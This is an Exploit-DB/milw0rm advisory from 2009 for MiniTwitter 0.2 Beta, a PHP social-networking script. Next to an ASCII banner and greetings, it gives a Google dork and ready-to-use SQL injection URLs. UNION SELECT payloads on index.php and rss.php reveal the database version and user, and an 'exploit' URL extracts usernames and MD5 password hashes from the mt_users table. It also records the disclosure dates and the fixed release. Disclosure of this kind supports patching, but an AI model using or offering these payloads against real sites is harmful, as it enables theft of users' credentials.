MiniTwitter 0.2b - Multiple SQL Injections

EDB-ID:

8586


Platform:

PHP

Published:

2009-05-01

***********************************************************************************************
***********************************************************************************************
**	       										     **
**  											     **
**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
**							                                     **
**    											     **
**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
**					¡PROUD TO BE SPANISH!				     **
**											     **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|       	   	     MULTIPLE SQL INJECTION VULNERABILITIES		      	     |
|--------------------------------------------------------------------------------------------|
|                         	|    MiniTwitter v0.2-Beta     |		 	     |
|  CMS INFORMATION:		 ------------------------------			             |
|										             |
|-->WEB: http://mt.bioscriptsdb.com/          				                     |
|-->DOWNLOAD: http://sourceforge.net/projects/minitt/           	                     |
|-->DEMO: http://www.bioscripts.net/minitwitter/index.php   	     			     |
|-->CATEGORY: Social Networking								     |
|-->DESCRIPTION: Your business needs a private twitter. You can add...		       	     |
|		several twitters account and use this twitter as a buckup of all...	     |
|-->RELEASED: 2009-04-30								     |
|											     |
|  CMS VULNERABILITY:									     |
|											     |
|-->TESTED ON: firefox 3								     |
|-->DORK: "BioScripts"							                     |
|-->CATEGORY: SQL INJECTION (SQLi)						             |
|-->AFFECT VERSION: <= 0.2 Beta				 			             |
|-->Discovered Bug date: 2009-04-30							     |
|-->Reported Bug date: 2009-04-30							     |
|-->Fixed bug date: 2009-05-01								     |
|-->Info patch (0.3 Beta): http://sourceforge.net/projects/minitt/  			     |
|-->Author: YEnH4ckEr									     |
|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
|-->WEB/BLOG: N/A									     |
|-->COMMENT: A mi novia Marijose...hermano,cuñada, padres (y amigos xD) por su apoyo.        |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
----------------------------------------------------------------------------------------------


##############################
//////////////////////////////

SQL INJECTION (SQLi):

/////////////////////////////
##############################



<<<<---------++++++++++++++ Condition-1: magic_quotes_gpc=off +++++++++++++++++--------->>>>

<<<<---------++++++++++++++++ Condition-2: Be register user +++++++++++++++++++--------->>>>



This aplication is completely vulnerable to sql injection.


-----
PoC:
-----


File: index.php Var: GET var 'user' -->


http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+1,version()/*


Return --> Database version.


File: inc/rss.php Var: GET var 'user' -->


http://[HOST]/[HOME_PATH]/rss.php?user=2%27+UNION+ALL+SELECT+user(),2/*


Return --> Database user.


---------
EXPLOIT:
---------


http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+2,concat(nick,0x3A3A3A,password)+FROM+mt_users+WHERE+id_usr=1/*


Return --> nick:::password(md5 hash)



<<<-----------------------------EOF---------------------------------->>>ENJOY IT!


#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##   GREETZ TO: JosS, Ulises2k and all SPANISH Hack3Rs community!    ##
##*******************************************************************##
#######################################################################
#######################################################################

# milw0rm.com [2009-05-01]